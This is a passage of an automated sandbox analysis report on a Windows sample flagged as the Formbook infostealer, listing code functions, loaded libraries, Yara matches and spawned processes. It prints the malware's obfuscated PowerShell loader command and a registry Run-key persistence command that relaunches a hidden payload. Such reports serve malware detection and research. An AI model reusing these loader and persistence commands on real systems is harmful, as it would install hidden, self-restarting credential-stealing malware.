Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038070E9 12_2_038070E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037FF0CC 12_2_037FF0CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037570C0 12_2_037570C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380F7B0 12_2_0380F7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03795630 12_2_03795630
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038016CC 12_2_038016CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038195C3 12_2_038195C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037ED5B0 12_2_037ED5B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03807571 12_2_03807571
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03741460 12_2_03741460
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380F43F 12_2_0380F43F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0378DBF9 12_2_0378DBF9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037C5BF0 12_2_037C5BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380FB76 12_2_0380FB76
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376FB80 12_2_0376FB80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037C3A6C 12_2_037C3A6C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037FDAC6 12_2_037FDAC6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03807A46 12_2_03807A46
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380FA49 12_2_0380FA49
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037EDAAC 12_2_037EDAAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03795AA0 12_2_03795AA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F1AA3 12_2_037F1AA3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03759950 12_2_03759950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376B950 12_2_0376B950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037E5910 12_2_037E5910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037BD800 12_2_037BD800
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037538E0 12_2_037538E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380FFB1 12_2_0380FFB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380FF09 12_2_0380FF09
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03713FD2 12_2_03713FD2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03713FD5 12_2_03713FD5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03751F92 12_2_03751F92
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03759EB0 12_2_03759EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03753D40 12_2_03753D40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376FDC0 12_2_0376FDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03801D5A 12_2_03801D5A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03807D73 12_2_03807D73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037C9C32 12_2_037C9C32
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380FCF2 12_2_0380FCF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D11370 12_2_02D11370
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D0A7B0 12_2_02D0A7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D0C730 12_2_02D0C730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D0C510 12_2_02D0C510
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D12EB0 12_2_02D12EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D12EAC 12_2_02D12EAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D29E80 12_2_02D29E80
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll 938580B466533DFA1461E9858FD106B60E1A52B713380915CC03AFD3E4B4573C
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D4EA12 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D15130 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22CCB970 appears 226 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D27E54 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D5F290 appears 101 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03785130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0373B970 appears 262 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 037BEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03797E54 appears 107 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 037CF290 appears 103 times
PE / OLE file has an invalid certificate
Source: 16042024124521.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: 16042024124521.exe, 00000000.00000000.1635388770.0000000000450000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamenoncrystallisings.exe2 vs 16042024124521.exe
Uses 32bit PE files
Source: 16042024124521.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Yara signature match
Source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/70@2/3
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046E6
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004020FE CoCreateInstance, 0_2_004020FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Users\user\AppData\Local\Temp\nsj1229.tmp Jump to behavior
Source: 16042024124521.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\16042024124521.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 16042024124521.exe Virustotal: Detection: 20%
Source: C:\Users\user\Desktop\16042024124521.exe File read: C:\Users\user\Desktop\16042024124521.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\16042024124521.exe "C:\Users\user\Desktop\16042024124521.exe"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kanels.exe "C:\Users\user\AppData\Local\Temp\Kanels.exe"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kanels.exe "C:\Users\user\AppData\Local\Temp\Kanels.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)" Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: iphlpapi.dll Jump to behavior
